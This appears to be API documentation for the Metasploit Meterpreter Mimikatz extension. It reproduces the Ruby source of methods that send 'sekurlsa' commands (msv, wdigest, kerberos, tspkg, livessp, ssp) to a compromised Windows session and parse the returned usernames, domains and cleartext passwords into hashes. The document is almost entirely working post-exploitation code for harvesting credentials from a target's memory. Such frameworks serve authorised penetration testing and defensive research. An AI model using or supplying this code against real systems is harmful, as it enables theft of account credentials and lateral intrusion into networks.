Class: Rex::Post::Meterpreter::Extensions::Mimikatz::Mimikatz

Inherits:
Rex::Post::Meterpreter::Extension
Defined in:
lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb

Overview

Mimikatz extension – extracts credentials from the memory of a Windows target. The `sekurlsa::*` wrappers below return parsed rows whose `:password` field may hold cleartext secrets, so treat their output as sensitive.

Benjamin DELPY `gentilkiwi` blog.gentilkiwi.com/mimikatz

Extension converted by Ben Campbell (Meatballs).

Instance Attribute Summary

Attributes inherited from Rex::Post::Meterpreter::Extension

#name

Instance Method Summary

Constructor Details

#initialize(client) ⇒ Mimikatz


# File 'lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb', line 24

# Creates the extension on +client+ and registers it under the 'mimikatz'
# alias (presumably exposing it as +client.mimikatz+ — see
# Client#register_extension_aliases).
#
# @param client the Meterpreter client session the extension is loaded into
def initialize(client)
  super(client, 'mimikatz')

  aliases = [{ 'name' => 'mimikatz', 'ext' => self }]
  client.register_extension_aliases(aliases)
end

Instance Method Details

#kerberos ⇒ Object


# File 'lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb', line 121

# Runs mimikatz's +sekurlsa::kerberos+ module on the target and returns the
# parsed rows (see #parse_creds_result).
#
# @return [Array<Hash>] one hash per row with :authid, :package, :user,
#   :domain and :password; :password may be a cleartext secret, so handle
#   the result as sensitive loot
def kerberos
  parse_creds_result(send_custom_command('sekurlsa::kerberos'))
end

#livessp ⇒ Object


# File 'lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb', line 106

# Runs mimikatz's +sekurlsa::livessp+ module on the target and returns the
# parsed rows (see #parse_creds_result).
#
# @return [Array<Hash>] one hash per row with :authid, :package, :user,
#   :domain and :password; :password may be a cleartext secret, so handle
#   the result as sensitive loot
def livessp
  parse_creds_result(send_custom_command('sekurlsa::livessp'))
end

#msv ⇒ Object


# File 'lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb', line 101

# Runs mimikatz's +sekurlsa::msv+ module on the target and returns the
# parsed rows (see #parse_creds_result).
#
# @return [Array<Hash>] one hash per row with :authid, :package, :user,
#   :domain and :password; the :password column is whatever the module
#   emits for this package, so treat the result as sensitive loot
def msv
  parse_creds_result(send_custom_command('sekurlsa::msv'))
end

#parse_creds_result(result) ⇒ Object


# File 'lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb', line 50

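# Parses the CSV text mimikatz returns for the sekurlsa credential modules
# (msv, wdigest, livessp, tspkg, kerberos) into one hash per row.
#
# Each row is expected as +authid,package,user,domain,password+; a column
# that is missing from a row comes through as nil rather than raising.
#
# @param result [String, nil] raw CSV output as returned by #send_custom_command
# @return [Array<Hash>] hashes keyed :authid, :package, :user, :domain and
#   :password; empty for nil or empty input. The :password column may hold
#   a cleartext secret — treat the result as sensitive.
# @raise [CSV::MalformedCSVError] if the input is not well-formed CSV.
#   NOTE(review): Ruby's CSV rejects a stray double quote inside an unquoted
#   field, so a password containing '"' could trigger this — consider a more
#   tolerant split if that shows up in practice.
def parse_creds_result(result)
  # Nothing came back (or an empty result TLV): no rows, not an exception.
  return [] if result.nil? || result.empty?

  CSV.parse(result).map do |row|
    {
      :authid   => row[0],
      :package  => row[1],
      :user     => row[2],
      :domain   => row[3],
      :password => row[4]
    }
  end
end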

#parse_ssp_result(result) ⇒ Object


# File 'lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb', line 66

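# Parses the CSV text of +sekurlsa::ssp+. Unlike the other credential modules
# the fifth column packs several "{ user ; domain ; password }" groups into a
# single field, so each group becomes its own hash while the row's own user
# and domain are carried along as :orig_user / :orig_domain.
#
# @param result [String, nil] raw CSV output as returned by #send_custom_command
# @return [Array<Hash>] one hash per "{ ... }" group with :authid, :package,
#   :user, :domain, :password, :orig_user and :orig_domain; empty for nil or
#   empty input. Rows without exactly five columns, or whose fifth column is
#   empty, are skipped. :password may be a cleartext secret — treat the
#   result as sensitive.
# @raise [CSV::MalformedCSVError] if the input is not well-formed CSV
def parse_ssp_result(result)
  return [] if result.nil? || result.empty?

  accounts = []
  CSV.parse(result).each do |row|
    # Truncated rows are skipped rather than raising. A trailing comma gives
    # a five-element row whose last field is nil, which would otherwise blow
    # up on nil.split below.
    next unless row.length == 5 && row[4]

    row[4].split(' }').each do |group|
      fields = group.split(' ; ')
      # A chunk with no fields at all (e.g. stray text after the last "}")
      # has nothing to extract.
      next if fields.empty?

      user = fields[0].split('{ ')[1]
      next unless user

      accounts << {
        :authid      => row[0],
        :package     => row[1],
        :user        => user,
        :domain      => fields[1],
        :password    => fields[2],
        :orig_user   => row[2],
        :orig_domain => row[3]
      }
    end
  end
  accounts
end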

#send_custom_command(function, args = []) ⇒ Object


# File 'lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb', line 46

# Runs a single mimikatz command on the target and returns its output as an
# ASCII string (see #send_custom_command_raw for the wire format).
#
# @param function [String] the mimikatz command, e.g. 'sekurlsa::msv'. It is
#   handed to the engine verbatim, so never build it from untrusted input.
# @param args [Array<String>] optional arguments, one TLV each
# @return [String] the raw result converted with Rex::Text.to_ascii.
#   NOTE(review): that conversion may drop or mangle non-ASCII characters
#   (e.g. in passwords) — verify against Rex::Text.to_ascii if that matters.
def send_custom_command(function, args=[])
  raw = send_custom_command_raw(function, args)
  Rex::Text.to_ascii(raw)
end

#send_custom_command_raw(function, args = []) ⇒ Object


# File 'lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb', line 36

# Sends a 'mimikatz_custom_command' request to the target and returns the
# result TLV without any decoding.
#
# @param function [String] mimikatz command placed in
#   TLV_TYPE_MIMIKATZ_FUNCTION; it is not validated here, so callers must not
#   source it from untrusted data
# @param args [Array<String>] each one added as a TLV_TYPE_MIMIKATZ_ARGUMENT,
#   in order
# @return [Object, nil] the TLV_TYPE_MIMIKATZ_RESULT value of the response
#   (presumably nil when the TLV is absent — depends on Packet#get_tlv_value)
#
# NOTE(review): transport or remote errors surface however
# client.send_request reports them; nothing is rescued here.
def send_custom_command_raw(function, args=[])
  request = Packet.create_request('mimikatz_custom_command').tap do |req|
    req.add_tlv(TLV_TYPE_MIMIKATZ_FUNCTION, function)
    args.each { |arg| req.add_tlv(TLV_TYPE_MIMIKATZ_ARGUMENT, arg) }
  end

  client.send_request(request).get_tlv_value(TLV_TYPE_MIMIKATZ_RESULT)
end

#ssp ⇒ Object


# File 'lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb', line 111

# Runs mimikatz's +sekurlsa::ssp+ module on the target and returns the
# parsed rows (see #parse_ssp_result, which unpacks the packed
# "{ user ; domain ; password }" groups of this module's output).
#
# @return [Array<Hash>] one hash per credential group with :authid,
#   :package, :user, :domain, :password, :orig_user and :orig_domain;
#   :password may be a cleartext secret, so handle the result as sensitive
def ssp
  parse_ssp_result(send_custom_command('sekurlsa::ssp'))
end

#tspkg ⇒ Object


# File 'lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb', line 116

# Runs mimikatz's +sekurlsa::tspkg+ module on the target and returns the
# parsed rows (see #parse_creds_result).
#
# @return [Array<Hash>] one hash per row with :authid, :package, :user,
#   :domain and :password; :password may be a cleartext secret, so handle
#   the result as sensitive loot
def tspkg
  parse_creds_result(send_custom_command('sekurlsa::tspkg'))
end

#wdigest ⇒ Object


# File 'lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb', line 96

# Runs mimikatz's +sekurlsa::wdigest+ module on the target and returns the
# parsed rows (see #parse_creds_result).
#
# @return [Array<Hash>] one hash per row with :authid, :package, :user,
#   :domain and :password; :password may be a cleartext secret, so handle
#   the result as sensitive loot. An empty array only means the module
#   reported nothing — whether the target caches wdigest secrets at all is
#   not something this wrapper can tell.
def wdigest
  parse_creds_result(send_custom_command('sekurlsa::wdigest'))
end